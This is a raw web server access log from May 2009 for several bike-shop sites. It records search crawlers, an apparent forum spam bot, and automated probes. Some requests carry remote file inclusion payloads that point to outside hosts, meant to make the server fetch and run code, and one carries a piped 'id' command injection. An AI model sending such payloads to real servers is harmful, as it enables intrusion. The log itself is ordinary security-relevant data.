91.121.150.170 - - [10/May/2009:15:26:51 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [10/May/2009:15:30:58 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
89.108.84.112 - - [10/May/2009:15:34:45 -0700] "GET /logs/access.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
89.108.84.112 - - [10/May/2009:15:34:45 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
89.108.84.112 - - [10/May/2009:15:34:45 -0700] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [10/May/2009:15:36:13 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
89.108.84.112 - - [10/May/2009:15:39:16 -0700] "GET /logs/access.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
89.108.84.112 - - [10/May/2009:15:39:16 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
89.108.84.112 - - [10/May/2009:15:39:16 -0700] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [10/May/2009:15:42:25 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [10/May/2009:15:43:59 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/May/2009:15:50:13 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
93.187.232.189 - - [10/May/2009:16:01:10 -0700] "GET /translations/Italian.txt//tools/send_reminders.php?noSet=0&includedir=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "houstonbikeshop.com"
93.187.232.189 - - [10/May/2009:16:01:10 -0700] "GET /translations/Italian.txt//tools/send_reminders.php?noSet=0&includedir=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "houstonbikeshop.com"
93.187.232.189 - - [10/May/2009:16:01:10 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "houstonbikeshop.com"
93.187.232.189 - - [10/May/2009:16:01:10 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "houstonbikeshop.com"
93.187.232.189 - - [10/May/2009:16:01:10 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "houstonbikeshop.com"
93.187.232.189 - - [10/May/2009:16:01:10 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "houstonbikeshop.com"
93.187.232.189 - - [10/May/2009:16:01:10 -0700] "GET /translations/Danish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "houstonbikeshop.com"
93.187.232.189 - - [10/May/2009:16:01:10 -0700] "GET /translations/Danish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "houstonbikeshop.com"
93.187.232.189 - - [10/May/2009:16:01:14 -0700] "GET /translations/Swedish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "bicyclestoreshouston.com"
93.187.232.189 - - [10/May/2009:16:01:14 -0700] "GET /translations/Swedish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "bicyclestoreshouston.com"
93.187.232.189 - - [10/May/2009:16:01:15 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "bicyclestoreshouston.com"
93.187.232.189 - - [10/May/2009:16:01:15 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "bicyclestoreshouston.com"
93.187.232.189 - - [10/May/2009:16:01:15 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "bicyclestoreshouston.com"
93.187.232.189 - - [10/May/2009:16:01:15 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "bicyclestoreshouston.com"
93.187.232.189 - - [10/May/2009:16:02:01 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "bicyclestoreshouston.com"
93.187.232.189 - - [10/May/2009:16:02:01 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "bicyclestoreshouston.com"
193.47.80.45 - - [10/May/2009:16:08:54 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.svbikes.com"
193.47.80.45 - - [10/May/2009:16:08:54 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.svbikes.com"
93.187.232.189 - - [10/May/2009:16:30:54 -0700] "GET /translations/Swedish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "bicyclestoreshouston.com"
93.187.232.189 - - [10/May/2009:16:30:55 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "bicyclestoreshouston.com"
93.187.232.189 - - [10/May/2009:16:30:55 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "bicyclestoreshouston.com"
93.187.232.189 - - [10/May/2009:16:33:46 -0700] "GET /translations/Italian.txt//tools/send_reminders.php?noSet=0&includedir=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "houstonbikeshop.com"
93.187.232.189 - - [10/May/2009:16:33:51 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "houstonbikeshop.com"
93.187.232.189 - - [10/May/2009:16:33:52 -0700] "GET /translations/Danish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "houstonbikeshop.com"
81.19.66.38 - - [10/May/2009:16:38:16 -0700] "GET /bullitinboard/viewtopic.php?p=1624 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/May/2009:16:38:17 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/May/2009:16:38:18 -0700] "GET /bullitinboard/viewtopic.php?p=1662 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/May/2009:16:38:18 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/May/2009:16:38:19 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
74.6.17.160 - - [10/May/2009:16:49:42 -0700] "GET /bullitinboard/viewtopic.php?p=16873 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.svbikes.com"
208.80.195.39 - - [10/May/2009:16:51:40 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Avant Browser; InfoPath.2; .NET CLR 2.0.50727)" "svbikes.com"
74.6.17.160 - - [10/May/2009:17:25:59 -0700] "GET /?N=D HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.svbikes.com"
194.8.75.92 - - [10/May/2009:17:30:18 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard//index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461)" "www.svbikes.com"
194.8.75.92 - - [10/May/2009:17:30:18 -0700] "GET / HTTP/1.0" 200 1748 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461)" "www.svbikes.com"
194.8.75.92 - - [10/May/2009:17:30:19 -0700] "GET /bullitinboard/ HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461)" "www.svbikes.com"
152.92.143.58 - - [10/May/2009:17:31:52 -0700] "GET /logs/scripts.log//main.cgi/file.txt?down_num=953713356&board=my_board&command=down_load&filename=file.txt%7Cid%7C HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "houstonbikeshop.com"
152.92.143.58 - - [10/May/2009:17:31:52 -0700] "GET /main.cgi/file.txt?down_num=953713356&board=my_board&command=down_load&filename=file.txt%7Cid%7C HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "houstonbikeshop.com"
152.92.143.58 - - [10/May/2009:17:31:52 -0700] "GET /logs//main.cgi/file.txt?down_num=953713356&board=my_board&command=down_load&filename=file.txt%7Cid%7C HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "houstonbikeshop.com"
208.80.195.32 - - [10/May/2009:17:52:08 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; yie6_SBC; .NET CLR 2.0.50727; IEMB3; SpamBlockerUtility 4.8.4; IEMB3)" "www.svbikes.com"
81.19.66.38 - - [10/May/2009:17:58:10 -0700] "GET /bullitinboard/viewtopic.php?p=1624 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/May/2009:17:58:10 -0700] "GET /bullitinboard/viewtopic.php?p=1662 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/May/2009:17:58:11 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.0" 200 517 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/May/2009:17:58:12 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/May/2009:17:58:13 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
72.30.79.122 - - [10/May/2009:18:02:22 -0700] "GET /translations/?S=A HTTP/1.0" 200 3831 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
72.30.79.122 - - [10/May/2009:18:21:53 -0700] "GET /bullitinboard/viewtopic.php?p=4044 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
91.121.150.170 - - [10/May/2009:18:22:11 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
194.8.74.47 - - [10/May/2009:18:34:08 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard//index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.2; .NET CLR 1.1.4322; yplus 4.4.02b)" "www.svbikes.com"
194.8.74.47 - - [10/May/2009:18:34:09 -0700] "GET / HTTP/1.0" 200 1748 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.2; .NET CLR 1.1.4322; yplus 4.4.02b)" "www.svbikes.com"
194.8.74.47 - - [10/May/2009:18:34:10 -0700] "GET /bullitinboard/ HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.2; .NET CLR 1.1.4322; yplus 4.4.02b)" "www.svbikes.com"
91.121.150.170 - - [10/May/2009:18:38:32 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
194.8.74.157 - - [10/May/2009:18:41:59 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard//index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1" "www.svbikes.com"
194.8.74.157 - - [10/May/2009:18:42:00 -0700] "GET / HTTP/1.0" 200 1748 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1" "www.svbikes.com"
194.8.74.157 - - [10/May/2009:18:42:01 -0700] "GET /bullitinboard/ HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1" "www.svbikes.com"
91.121.150.170 - - [10/May/2009:18:44:41 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [10/May/2009:19:05:00 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [10/May/2009:19:05:18 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
81.19.66.38 - - [10/May/2009:19:10:35 -0700] "GET /bullitinboard/viewtopic.php?p=1624 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/May/2009:19:10:36 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/May/2009:19:10:37 -0700] "GET /bullitinboard/viewtopic.php?p=1662 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/May/2009:19:10:37 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/May/2009:19:10:37 -0700] "GET /bullitinboard/viewtopic.php?p=2036 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
91.121.150.170 - - [10/May/2009:19:16:09 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/May/2009:19:19:22 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/May/2009:19:23:12 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [10/May/2009:19:25:25 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [10/May/2009:19:34:59 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [10/May/2009:19:51:26 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
174.129.136.188 - - [10/May/2009:19:59:37 -0700] "GET /translations/Swedish.txt HTTP/1.1" 200 31485 "-" "AISearchBot (Email: aisearchbot@gmail.com; If your web site doesn't want to be crawled, please send us a email.)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/May/2009:19:59:41 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
174.129.136.188 - - [10/May/2009:20:00:08 -0700] "GET /translations/Danish.txt HTTP/1.1" 200 31970 "-" "AISearchBot (Email: aisearchbot@gmail.com; If your web site doesn't want to be crawled, please send us a email.)" "houstonbikeshop.com"
81.19.66.38 - - [10/May/2009:20:12:31 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/May/2009:20:12:32 -0700] "GET /bullitinboard/viewtopic.php?p=1662 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/May/2009:20:12:32 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/May/2009:20:12:36 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/May/2009:20:12:37 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
72.30.78.244 - - [10/May/2009:20:34:59 -0700] "GET /logs/?S=A HTTP/1.0" 200 2352 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
74.6.17.160 - - [10/May/2009:20:41:05 -0700] "GET /bullitinboard/viewtopic.php?p=4428 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.svbikes.com"
91.121.150.170 - - [10/May/2009:21:19:20 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
119.63.194.59 - - [10/May/2009:21:20:42 -0700] "GET /bullitinboard/viewtopic.php?p=5049 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
119.63.194.59 - - [10/May/2009:21:20:42 -0700] "GET /bullitinboard/viewtopic.php?p=1680 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
119.63.194.59 - - [10/May/2009:21:20:42 -0700] "GET /bullitinboard/viewtopic.php?p=14295 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
81.19.66.38 - - [10/May/2009:21:33:11 -0700] "GET /bullitinboard/viewtopic.php?p=1624 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/May/2009:21:33:12 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/May/2009:21:33:12 -0700] "GET /bullitinboard/viewtopic.php?p=1662 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/May/2009:21:33:13 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/May/2009:21:33:14 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
91.121.150.170 - - [10/May/2009:21:42:14 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
119.63.194.59 - - [10/May/2009:21:44:06 -0700] "GET /bullitinboard/viewtopic.php?p=3417 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
68.91.115.217 - - [10/May/2009:21:44:48 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" "www.svbikes.com"
68.91.115.217 - - [10/May/2009:21:44:48 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" "www.svbikes.com"
68.91.115.217 - - [10/May/2009:21:44:51 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" "www.svbikes.com"
68.91.115.217 - - [10/May/2009:21:45:01 -0700] "GET /P1000199.JPG HTTP/1.1" 200 1640919 "http://www.svbikes.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" "www.svbikes.com"
68.91.115.217 - - [10/May/2009:21:45:18 -0700] "GET /fit.html HTTP/1.1" 200 17443 "http://www.svbikes.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" "www.svbikes.com"
68.91.115.217 - - [10/May/2009:21:45:18 -0700] "GET /images/fit2.gif HTTP/1.1" 404 275 "http://www.svbikes.com/fit.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" "www.svbikes.com"
68.91.115.217 - - [10/May/2009:21:45:18 -0700] "GET /images/SVB_Logos_gif_version_1_.gif HTTP/1.1" 404 275 "http://www.svbikes.com/fit.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" "www.svbikes.com"
68.91.115.217 - - [10/May/2009:21:45:24 -0700] "GET /Bikes.html HTTP/1.1" 404 275 "http://www.svbikes.com/fit.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" "www.svbikes.com"
68.91.115.217 - - [10/May/2009:21:45:34 -0700] "GET /Employeesite/ HTTP/1.1" 401 395 "http://www.svbikes.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" "www.svbikes.com"
91.121.150.170 - - [10/May/2009:21:48:12 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
119.63.194.59 - - [10/May/2009:22:19:14 -0700] "GET /bullitinboard/viewtopic.php?p=15414 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
119.63.194.59 - - [10/May/2009:22:20:42 -0700] "GET /bullitinboard/viewtopic.php?p=2490 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
119.63.194.59 - - [10/May/2009:22:20:44 -0700] "GET /bullitinboard/viewtopic.php?p=13487 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
119.63.194.59 - - [10/May/2009:22:22:33 -0700] "GET /bullitinboard/viewtopic.php?p=4086 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
119.63.194.59 - - [10/May/2009:22:22:34 -0700] "GET /bullitinboard/viewtopic.php?p=13029 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
119.63.194.59 - - [10/May/2009:22:44:09 -0700] "GET /bullitinboard/viewtopic.php?p=14760 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
91.121.150.170 - - [10/May/2009:23:02:38 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [10/May/2009:23:02:38 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
119.63.194.59 - - [10/May/2009:23:09:04 -0700] "GET /bullitinboard/viewtopic.php?p=4858 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
91.121.150.170 - - [10/May/2009:23:19:01 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
